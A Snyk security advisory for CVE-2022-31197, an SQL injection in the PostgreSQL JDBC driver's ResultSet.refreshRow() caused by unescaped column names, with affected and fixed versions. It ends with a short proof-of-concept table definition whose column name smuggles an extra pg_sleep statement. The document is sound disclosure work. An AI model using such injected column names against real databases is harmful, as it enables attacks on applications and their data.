SQL Injection Affecting org.postgresql:postgresql package, versions [,42.2.26) [42.3.0,42.3.7) [42.4.0,42.4.1)
Snyk CVSS
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGPOSTGRESQL-2970521
- published 4 Aug 2022
- disclosed 4 Aug 2022
- credit kato sho
Introduced: 4 Aug 2022
CVE-2022-31197 Open this link in a new tabHow to fix?
Upgrade org.postgresql:postgresql
to version 42.2.26, 42.3.7, 42.4.1 or higher.
Overview
org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.
Affected versions of this package are vulnerable to SQL Injection via the java.sql.ResultRow.refreshRow()
function in jdbc/PgResultSet.java
, due to insufficient escaping column names. An attacker with control of the underlying database can name a column with a string containing a semicolon or other statement terminator, then convince a user to run a query against the table with the compromised column, and then have the application run ResultSet.refreshRow()
, to execute code.
NOTE:
- An application that only connects to its own database with a fixed schema with no DDL permissions is not affected by this vulnerability.
- Additionally, applications that do not invoke
ResultSet.refreshRow()
are not affected.
PoC:
CREATE TABLE refresh_row_example (
id int PRIMARY KEY,
"1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * " int
);